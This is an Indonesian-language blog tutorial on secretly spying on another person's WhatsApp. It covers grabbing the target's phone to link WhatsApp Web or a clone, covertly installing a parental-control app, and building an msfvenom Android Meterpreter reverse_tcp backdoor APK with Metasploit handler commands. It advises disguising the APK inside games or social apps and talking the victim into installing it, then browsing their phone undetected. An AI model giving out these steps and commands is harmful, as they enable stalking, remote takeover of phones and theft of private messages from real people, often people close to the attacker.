Cara Sadap Whatsapp (WA)

Cara Sadap Whatsapp (WA)

Whatsapp menjadi aplikasi perpesanan instan yang memang sekarang ini mempunyai ratusan pengguna aktif baik menggunakan iphone maupun dengan android. Maka dari itu, semakin banyak yang mencari cara sadap whatsapp yang paling manjur dan bisa digunakan.

Cara sadap whatsapp sebenarnya ada banyak sekali, yang secara intinya akan kita bagi menjadi dua macam, yang pertama sadap whatsapp dengan menyentuh HP korban dan yang kedua tanpa menyentuh HP korban. Kedua cara ini berbeda jauh dari penerapan teorinya.

Namun kalau anda tetap ingin belajar cara menyadap whatsapp, yuk kita akan kumpas tuntas caranya namun jangan disalahgunakan.

Cara Sadap Whatsapp dengan Menyentuh HP Korban

Cara Sadap Whatsapp dengan Menyentuh HP Korban

Secara teori logika saja anda harus bisa mengakses HP dari target yang akan anda sadap. Dan cara ini sangat cocok anda terapkan terhadap orang terdekat anda, karena peluang untuk memegang HP nya sangatlah besar. Paling cuma ada kendala di password saja, namun anda bisa dong akting untuk meminjam HP nya.

Ada beberapa cara yang bisa anda gunakan jika target anda memang orang terdekat di sekeliling anda. Diantaranya :

1. Menggunakan Whatsapp Web

Whastapp Web memang menjadi aplikasi dan teknik pilihan paling mudah untuk menyadap whatsapp orang terdekat. Bahkan anda bisa dengan mudah untuk masuk ke akun target, asalkan anda juga bisa lebih dulu menguasai ponsel target.

Seperti anda pada umunya ketika ingin login whasapp web, namun bedanya kali ini anda login dengan akun whatsa[[ orang lain. dan hasilnya ? Anda sekarang bisa mengetahui apa saja obrolan yang akan masuk di ponsel target anda.

Namun cara ini kurang efektif, karena membuka whatsapp web, tentu akan tampil notifikasi di ponsel target bahwa ada yang sedang membuka akun whatsapp nya dari sebuah web browser.Seringnya cara ini mudah banget untuk di ketahui.

2. Menggunakan Whatsapp Clone

Seperti halnya dengan whatsapp web , whatsapp clone juga membutuhkan kode QR untuk bisa masuk ke dalam akun target korban. Masih sama dengan whatsapp web, hanya bedanya cara ini menggunakan android juga, jadi tidak perlu menggunakan komputer.

Cara ini juga kurang efektif karena notifikasi akan muncl di handphone target kalau ada yang sedang membuka akun nya dari versi dekstop. Kalau orang yang masih awam mungkin masih bisa, namun kalau yang sudah berpengalaman dengan teknologi, tentu cara ini tidak akan berhasil.

3. Menggunakan Aplikasi Parental Control

Aplikasi parental control sebenarnya ada banyak di toko aplikasi. Aplikasi ini untuk memonitor aktifitas anak dengan melacak keseharian handphone nya. Baik itu lokasi, riwayat chat di sosial media maupun di maps pasti akan ketahuan aktifitasnya.

Selain itu memang di dalam aplikasi ini sudah dilengkapi dengan berbagai alat pelacak, bahkan anda bisa mengontrol HP target dari jarak jauh.

Caranya cukup mudah, cukup mengintsall aplikasi parental control di handphone target dan handphone anda. Salah satu aplikasi yang bisa anda coba adalah famisafe, aplikasi ini yang menurut saya paling mudah untuk digunakan.

Baca Juga : Cara Mengetahui Whatsapp Disadap

Cara Sadap Whatsapp Tanpa Menyentuh HP Korban

cara sadap whatsapp

Untuk cara sadap whatsapp yang kedua ini, memang dilakukan oleh yang sudah profesional dan biasanya dilakukan oleh para peretas. Untuk paham dengan teknik ini anda harus paham juga dengan beberapa perintah dasar linux, karena memang hanya bisa dilakukan di linux environment.

Anda bisa menggunakan linux debian atau ubuntu maupun distro turunanya, kalau menggunakan android anda bisa menggunakan andrax maupun kalinethunter, termux juga bisa namun kurang lengkap.

Karena pada dasarnya akan menggunakan tools yang sama yaitu metasploit.

Dengan metasploit kita akan membuat aplikasi backdoor dimana nantinya jika aplikasi ini berhasil terpasang di HP korban dan dapat mengecohnya, kita akan punya akses langsung ke dalam ponsel target dan tanpa perlu permisi.

Jangankan pesan whatsapp, apapun yang ada didalam ponsel target akan terbaca semua, dan anda punya akses penuh ke dalam ponsel target. Anda bisa memanggil kontak, atau sms nomor kontak yang ada di ponsel korban.

Cara install metasploit bisa anda baca di postingan sebelumnya di 4 cara install Metasploit 100 % work !

Untuk cara membuat aplikasi backdoor nya anda gunakan perintah ini msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /sdcard/backdoor.apk

Keterangan :
– Ganti LHOST dengan ip kalian
– Lport bisa menggunakan 4444 atau 8080
– backdoor.apk adalah nama aplikasi yang akan dibuat. Ganti saja dengan nama yang membuat orang lain jadi sangat penasaran atau kalau anda lebih mahir lagi anda bisa menggabungkanya dengan aplikasi lain seperti media sosial maupun game.

Setelah jadi, cari nama file apk nya dan kirimkan saja ke target, lalu buatlah dia menginstallnya. Bujuk rayu anda atau social enginering di sini sangat diperlukan.

Kalau sudah terinstall koneksikan dengan server dari anda, dengan backdoor tadi dengan perintah dibawah ini :

  • use multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set lhost 192.168.1.101
  • set lport 4444
  • exploit

Kalau sudah terkoneksi, silahkan coba saja dengan sys info, maka informasi system ponsel target akan terbaca disini. Silahkan eksplore saja sendiri apa yang ada di ponsel target tanpa perlu takut ketahuan.

Cara sadap whatsapp ini memang efektif, namun membutuhkan cara khusus dan skill tersendiri mengenai linux dan berbagai tools yang ada. Jika kalian masih bingung, silahkan tulis pertanyaan kalian di kolom komentar.